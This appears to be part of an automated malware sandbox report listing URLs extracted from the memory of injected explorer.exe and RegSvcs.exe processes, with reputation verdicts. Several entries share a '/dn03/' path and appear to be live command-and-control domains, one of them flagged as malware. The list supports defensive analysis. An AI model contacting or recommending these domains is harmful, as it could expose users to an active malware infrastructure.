                                          http://www.ioco.in/dn03/explorer.exe, 00000014.00000003.3085276974.000000000C2A7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000003.2290783207.000000000C272000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000002.3768699084.000000000C28A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000003.2300737680.000000000C2A7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000003.2292457843.000000000C27F000.00000004.00000001.00020000.00000000.sdmpfalse
                                          • Avira URL Cloud: safe
                                          unknown
                                          https://assets.msn.com/weathermapdata/1/static/finance/1stparty/FinanceTaskbarIcons/Finance_Earningsexplorer.exe, 00000014.00000003.3084872227.0000000007065000.00000004.00000001.00020000.00000000.sdmpfalse
                                          • URL Reputation: safe
                                          unknown
                                          http://www.sukhiclothing.comexplorer.exe, 00000014.00000003.3085276974.000000000C2A7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000003.2290783207.000000000C272000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000002.3768699084.000000000C28A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000003.2300737680.000000000C2A7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000003.2292457843.000000000C27F000.00000004.00000001.00020000.00000000.sdmpfalse
                                          • Avira URL Cloud: safe
                                          unknown
                                          http://www.sukhiclothing.com/dn03/www.banditsolana.comexplorer.exe, 00000014.00000003.3085276974.000000000C2A7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000003.2290783207.000000000C272000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000002.3768699084.000000000C28A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000003.2300737680.000000000C2A7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000003.2292457843.000000000C27F000.00000004.00000001.00020000.00000000.sdmpfalse
                                          • Avira URL Cloud: safe
                                          unknown
                                          https://android.notify.windows.com/iOSJMexplorer.exe, 00000014.00000000.1351724632.000000000BDC8000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000003.2299538498.000000000BDC8000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000003.3085301660.000000000BDC8000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000002.3765324771.000000000BDC8000.00000004.00000001.00020000.00000000.sdmpfalse
                                          • URL Reputation: safe
                                          unknown
                                          https://windows.msn.com:443/shell?osLocale=en-GB&chosenMarketReason=ImplicitNewexplorer.exe, 00000014.00000003.2295790018.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000002.3754530679.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000000.1341838999.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000003.3083513944.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000003.3084872227.0000000007065000.00000004.00000001.00020000.00000000.sdmpfalse
                                          • URL Reputation: safe
                                          unknown
                                          http://www.banditsolana.com/dn03/explorer.exe, 00000014.00000003.3085276974.000000000C2A7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000003.2290783207.000000000C272000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000002.3768699084.000000000C28A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000003.2300737680.000000000C2A7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000003.2292457843.000000000C27F000.00000004.00000001.00020000.00000000.sdmpfalse
                                          • Avira URL Cloud: safe
                                          unknown
                                          http://www.jasonnutter.golf/dn03/explorer.exe, 00000014.00000003.3085276974.000000000C2A7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000003.2290783207.000000000C272000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000002.3768699084.000000000C28A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000003.2300737680.000000000C2A7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000003.2292457843.000000000C27F000.00000004.00000001.00020000.00000000.sdmpfalse
                                          • Avira URL Cloud: safe
                                          unknown
                                          https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gPi8-darkexplorer.exe, 00000014.00000003.2295790018.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000002.3754530679.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000000.1341838999.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000003.3083513944.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000003.3084872227.0000000007065000.00000004.00000001.00020000.00000000.sdmpfalse
                                          • URL Reputation: safe
                                          unknown
                                          http://www.banditsolana.comReferer:explorer.exe, 00000014.00000003.3085276974.000000000C2A7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000003.2290783207.000000000C272000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000002.3768699084.000000000C28A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000003.2300737680.000000000C2A7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000003.2292457843.000000000C27F000.00000004.00000001.00020000.00000000.sdmpfalse
                                          • Avira URL Cloud: safe
                                          unknown
                                          http://www.cyberxdefend.com/dn03/www.ioco.inexplorer.exe, 00000014.00000003.3085276974.000000000C2A7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000003.2290783207.000000000C272000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000002.3768699084.000000000C28A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000003.2300737680.000000000C2A7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000003.2292457843.000000000C27F000.00000004.00000001.00020000.00000000.sdmpfalse
                                          • Avira URL Cloud: safe
                                          unknown
                                          https://outlook.comexplorer.exe, 00000014.00000000.1351724632.000000000BDC8000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000003.2299538498.000000000BDC8000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000003.3085301660.000000000BDC8000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000002.3765324771.000000000BDC8000.00000004.00000001.00020000.00000000.sdmpfalse
                                          • URL Reputation: safe
                                          unknown
                                          http://www.mcapitalparticipacoes.comReferer:explorer.exe, 00000014.00000003.3085276974.000000000C2A7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000003.2290783207.000000000C272000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000002.3768699084.000000000C28A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000003.2300737680.000000000C2A7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000003.2292457843.000000000C27F000.00000004.00000001.00020000.00000000.sdmpfalse
                                          • Avira URL Cloud: safe
                                          unknown
                                          http://www.servicepmgtl.world/dn03/www.sukhiclothing.comexplorer.exe, 00000014.00000003.3085276974.000000000C2A7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000003.2290783207.000000000C272000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000002.3768699084.000000000C28A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000003.2300737680.000000000C2A7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000003.2292457843.000000000C27F000.00000004.00000001.00020000.00000000.sdmpfalse
                                          • Avira URL Cloud: malware
                                          unknown
                                          http://www.numericalsemantics.comReferer:explorer.exe, 00000014.00000003.3085276974.000000000C2A7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000003.2290783207.000000000C272000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000002.3768699084.000000000C28A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000003.2300737680.000000000C2A7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000003.2292457843.000000000C27F000.00000004.00000001.00020000.00000000.sdmpfalse
                                          • Avira URL Cloud: safe
                                          unknown
                                          http://www.cataclysmicgamingapparel.comexplorer.exe, 00000014.00000003.3085276974.000000000C2A7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000003.2290783207.000000000C272000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000002.3768699084.000000000C28A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000003.2300737680.000000000C2A7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000003.2292457843.000000000C27F000.00000004.00000001.00020000.00000000.sdmpfalse
                                          • Avira URL Cloud: safe
                                          unknown
                                          http://www.w937xb.comexplorer.exe, 00000014.00000003.3085276974.000000000C2A7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000003.2290783207.000000000C272000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000002.3768699084.000000000C28A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000003.2300737680.000000000C2A7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000003.2292457843.000000000C27F000.00000004.00000001.00020000.00000000.sdmpfalse
                                          • Avira URL Cloud: safe
                                          unknown
                                          https://android.notify.windows.com/iOSZMexplorer.exe, 00000014.00000000.1351724632.000000000BDC8000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000003.2299538498.000000000BDC8000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000003.3085301660.000000000BDC8000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000002.3765324771.000000000BDC8000.00000004.00000001.00020000.00000000.sdmpfalse
                                          • URL Reputation: safe
                                          unknown
                                          http://www.w937xb.com/dn03/www.servicepmgtl.worldexplorer.exe, 00000014.00000003.3085276974.000000000C2A7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000003.2290783207.000000000C272000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000002.3768699084.000000000C28A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000003.2300737680.000000000C2A7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000003.2292457843.000000000C27F000.00000004.00000001.00020000.00000000.sdmpfalse
                                          • Avira URL Cloud: safe
                                          unknown
                                          https://android.notify.windows.com/iOSexplorer.exe, 00000014.00000000.1351724632.000000000BDC8000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000003.2299538498.000000000BDC8000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000003.3085301660.000000000BDC8000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000002.3765324771.000000000BDC8000.00000004.00000001.00020000.00000000.sdmpfalse
                                          • URL Reputation: safe
                                          unknown
                                          https://www.yelp.comexplorer.exe, 00000014.00000003.2295790018.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000002.3754530679.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000000.1341838999.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000003.3083513944.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000003.3084872227.0000000007065000.00000004.00000001.00020000.00000000.sdmpfalse
                                          • Avira URL Cloud: safe
                                          unknown
                                          https://www.msn.com/en-us/news/us/dumb-and-dumber-12-states-with-the-absolute-worst-education-in-theexplorer.exe, 00000014.00000003.2295790018.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000002.3754530679.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000000.1341838999.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000003.3083513944.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000003.3084872227.0000000007065000.00000004.00000001.00020000.00000000.sdmpfalse
                                          • URL Reputation: safe
                                          unknown
                                          http://www.top-dao.com/dn03/explorer.exe, 00000014.00000003.3085276974.000000000C2A7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000003.2290783207.000000000C272000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000002.3768699084.000000000C28A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000003.2300737680.000000000C2A7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000003.2292457843.000000000C27F000.00000004.00000001.00020000.00000000.sdmpfalse
                                          • Avira URL Cloud: safe
                                          unknown
                                          https://assets.msn.com/weathermapdata/1/static/weather/Icons/JyNGQgA=/Condition/MostlyClearNight.svgexplorer.exe, 00000014.00000003.3084872227.0000000007065000.00000004.00000001.00020000.00000000.sdmpfalse
                                          • URL Reputation: safe
                                          unknown
                                          http://www.servicepmgtl.world/dn03/explorer.exe, 00000014.00000003.3085276974.000000000C2A7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000003.2290783207.000000000C272000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000002.3768699084.000000000C28A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000003.2300737680.000000000C2A7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000003.2292457843.000000000C27F000.00000004.00000001.00020000.00000000.sdmpfalse
                                          • Avira URL Cloud: malware
                                          unknown
                                          https://www.msn.com/en-us/news/politics/kevin-mccarthy-s-ouster-as-house-speaker-could-cost-gop-its-explorer.exe, 00000014.00000003.2295790018.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000002.3754530679.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000000.1341838999.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000003.3083513944.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000003.3084872227.0000000007065000.00000004.00000001.00020000.00000000.sdmpfalse
                                          • URL Reputation: safe
                                          unknown
                                          http://www.mcapitalparticipacoes.com/dn03/www.top-dao.comexplorer.exe, 00000014.00000003.3085276974.000000000C2A7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000003.2290783207.000000000C272000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000002.3768699084.000000000C28A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000003.2300737680.000000000C2A7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000003.2292457843.000000000C27F000.00000004.00000001.00020000.00000000.sdmpfalse
                                          • Avira URL Cloud: safe
                                          unknown
                                          http://www.cyberxdefend.comexplorer.exe, 00000014.00000003.3085276974.000000000C2A7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000003.2290783207.000000000C272000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000002.3768699084.000000000C28A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000003.2300737680.000000000C2A7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000003.2292457843.000000000C27F000.00000004.00000001.00020000.00000000.sdmpfalse
                                          • Avira URL Cloud: safe
                                          unknown
                                          http://www.cataclysmicgamingapparel.com/dn03/www.cyberxdefend.comexplorer.exe, 00000014.00000003.3085276974.000000000C2A7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000003.2290783207.000000000C272000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000002.3768699084.000000000C28A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000003.2300737680.000000000C2A7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000003.2292457843.000000000C27F000.00000004.00000001.00020000.00000000.sdmpfalse
                                          • Avira URL Cloud: safe
                                          unknown
                                          https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gKhb-darkexplorer.exe, 00000014.00000003.2295790018.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000002.3754530679.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000000.1341838999.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000003.3083513944.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000003.3084872227.0000000007065000.00000004.00000001.00020000.00000000.sdmpfalse
                                          • URL Reputation: safe
                                          unknown
                                          https://api.msn.com/v1/news/Feed/Windows?z$explorer.exe, 00000014.00000000.1348137626.0000000008685000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000003.3083839373.0000000008685000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000002.3757157162.0000000008685000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000003.2297215475.0000000008685000.00000004.00000001.00020000.00000000.sdmpfalse
                                          • URL Reputation: safe
                                          unknown
                                          https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gPfv-darkexplorer.exe, 00000014.00000003.2295790018.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000002.3754530679.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000000.1341838999.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000003.3083513944.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000003.3084872227.0000000007065000.00000004.00000001.00020000.00000000.sdmpfalse
                                          • URL Reputation: safe
                                          unknown
                                          https://www.msn.com/en-us/lifestyle/lifestyle-buzz/what-to-do-if-a-worst-case-nuclear-scenario-actuaexplorer.exe, 00000014.00000003.2295790018.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000002.3754530679.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000000.1341838999.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000003.3083513944.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000003.3084872227.0000000007065000.00000004.00000001.00020000.00000000.sdmpfalse
                                          • URL Reputation: safe
                                          unknown
                                          https://www.msn.com/en-us/news/world/a-second-war-could-easily-erupt-in-europe-while-everyone-s-distexplorer.exe, 00000014.00000003.2295790018.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000002.3754530679.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000000.1341838999.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000003.3083513944.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000003.3084872227.0000000007065000.00000004.00000001.00020000.00000000.sdmpfalse
                                          • URL Reputation: safe
                                          unknown
                                          http://www.ibsensoftware.com/RegSvcs.exe, RegSvcs.exe, 0000000F.00000002.3739899679.0000000000400000.00000040.00000400.00020000.00000000.sdmpfalse
                                          • URL Reputation: safe
                                          unknown
                                          http://www.mcapitalparticipacoes.comexplorer.exe, 00000014.00000003.3085276974.000000000C2A7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000003.2290783207.000000000C272000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000002.3768699084.000000000C28A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000003.2300737680.000000000C2A7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000003.2292457843.000000000C27F000.00000004.00000001.00020000.00000000.sdmpfalse
                                          • Avira URL Cloud: safe
                                          unknown
                                          http://www.servicepmgtl.worldReferer:explorer.exe, 00000014.00000003.3085276974.000000000C2A7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000003.2290783207.000000000C272000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000002.3768699084.000000000C28A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000003.2300737680.000000000C2A7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000003.2292457843.000000000C27F000.00000004.00000001.00020000.00000000.sdmpfalse
                                          • Avira URL Cloud: safe
                                          unknown
                                          http://www.imdcaam.com/dn03/www.lovedacademy.comexplorer.exe, 00000014.00000003.3085276974.000000000C2A7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000003.2290783207.000000000C272000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000002.3768699084.000000000C28A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000003.2300737680.000000000C2A7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000003.2292457843.000000000C27F000.00000004.00000001.00020000.00000000.sdmpfalse
                                          • Avira URL Cloud: safe
                                          unknown
                                          https://www.msn.com/en-us/weather/topstories/first-map-of-earth-s-lost-continent-has-been-published/explorer.exe, 00000014.00000003.2295790018.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000002.3754530679.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000000.1341838999.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000003.3083513944.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000003.3084872227.0000000007065000.00000004.00000001.00020000.00000000.sdmpfalse
                                          • URL Reputation: safe
                                          unknown
                                          http://www.cataclysmicgamingapparel.com/dn03/explorer.exe, 00000014.00000003.3085276974.000000000C2A7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000003.2290783207.000000000C272000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000002.3768699084.000000000C28A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000003.2300737680.000000000C2A7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000003.2292457843.000000000C27F000.00000004.00000001.00020000.00000000.sdmpfalse
                                          • Avira URL Cloud: safe
                                          unknown
                                          http://www.vivaness.clubReferer:explorer.exe, 00000014.00000003.3085276974.000000000C2A7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000003.2290783207.000000000C272000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000002.3768699084.000000000C28A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000003.2300737680.000000000C2A7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000003.2292457843.000000000C27F000.00000004.00000001.00020000.00000000.sdmpfalse
                                          • Avira URL Cloud: safe
                                          unknown
                                          http://schemas.microexplorer.exe, 00000014.00000002.3756715275.00000000082D0000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000014.00000002.3755615297.0000000007670000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000014.00000000.1337250517.0000000002C60000.00000002.00000001.00040000.00000000.sdmpfalse
                                          • URL Reputation: safe
                                          unknown
                                          https://assets.msn.com/weathermapdata/1/static/weather/Icons/JyNGQgA=/Teaser/recordhigh.svgexplorer.exe, 00000014.00000003.2295790018.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000002.3754530679.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000000.1341838999.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000003.3083513944.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000003.3084872227.0000000007065000.00000004.00000001.00020000.00000000.sdmpfalse
                                          • URL Reputation: safe
                                          unknown
                                          https://parade.com/61481/toriavey/where-did-hamburgers-originateexplorer.exe, 00000014.00000003.2295790018.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000002.3754530679.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000000.1341838999.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000003.3083513944.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000003.3084872227.0000000007065000.00000004.00000001.00020000.00000000.sdmpfalse
                                          • URL Reputation: safe
                                          unknown
                                          http://www.mcapitalparticipacoes.com/dn03/explorer.exe, 00000014.00000003.3085276974.000000000C2A7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000003.2290783207.000000000C272000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000002.3768699084.000000000C28A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000003.2300737680.000000000C2A7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000003.2292457843.000000000C27F000.00000004.00000001.00020000.00000000.sdmpfalse
                                          • Avira URL Cloud: safe
                                          unknown
                                          http://www.top-dao.comexplorer.exe, 00000014.00000003.3085276974.000000000C2A7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000003.2290783207.000000000C272000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000002.3768699084.000000000C28A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000003.2300737680.000000000C2A7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000003.2292457843.000000000C27F000.00000004.00000001.00020000.00000000.sdmpfalse
                                          • Avira URL Cloud: safe
                                          unknown
                                          http://www.vivaness.club/dn03/explorer.exe, 00000014.00000003.3085276974.000000000C2A7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000003.2290783207.000000000C272000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000002.3768699084.000000000C28A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000003.2300737680.000000000C2A7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000003.2292457843.000000000C27F000.00000004.00000001.00020000.00000000.sdmpfalse
                                          • Avira URL Cloud: safe
                                          unknown
                                          http://www.cataclysmicgamingapparel.comReferer:explorer.exe, 00000014.00000003.3085276974.000000000C2A7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000003.2290783207.000000000C272000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000002.3768699084.000000000C28A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000003.2300737680.000000000C2A7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000003.2292457843.000000000C27F000.00000004.00000001.00020000.00000000.sdmpfalse
                                          • Avira URL Cloud: safe
                                          unknown
                                          https://www.msn.com/en-us/news/technology/prehistoric-comet-impacted-earth-and-triggered-the-switch-explorer.exe, 00000014.00000003.2295790018.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000002.3754530679.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000000.1341838999.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000003.3083513944.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000003.3084872227.0000000007065000.00000004.00000001.00020000.00000000.sdmpfalse
                                          • URL Reputation: safe
                                          unknown
                                          https://api.msn.com/~Texplorer.exe, 00000014.00000000.1348137626.0000000008796000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000002.3757157162.0000000008796000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000003.2297215475.0000000008796000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000003.3083839373.0000000008796000.00000004.00000001.00020000.00000000.sdmpfalse
                                          • URL Reputation: safe
                                          unknown
                                          https://windows.msn.com:443/shellv2?osLocale=en-GB&chosenMarketReason=ImplicitNewexplorer.exe, 00000014.00000003.2295790018.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000002.3754530679.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000000.1341838999.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000003.3083513944.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000003.3084872227.0000000007065000.00000004.00000001.00020000.00000000.sdmpfalse
                                          • URL Reputation: safe
                                          unknown
                                          http://www.jasonnutter.golfexplorer.exe, 00000014.00000003.3085276974.000000000C2A7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000003.2290783207.000000000C272000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000002.3768699084.000000000C28A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000003.2300737680.000000000C2A7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000003.2292457843.000000000C27F000.00000004.00000001.00020000.00000000.sdmpfalse
                                          • Avira URL Cloud: safe
                                          unknown
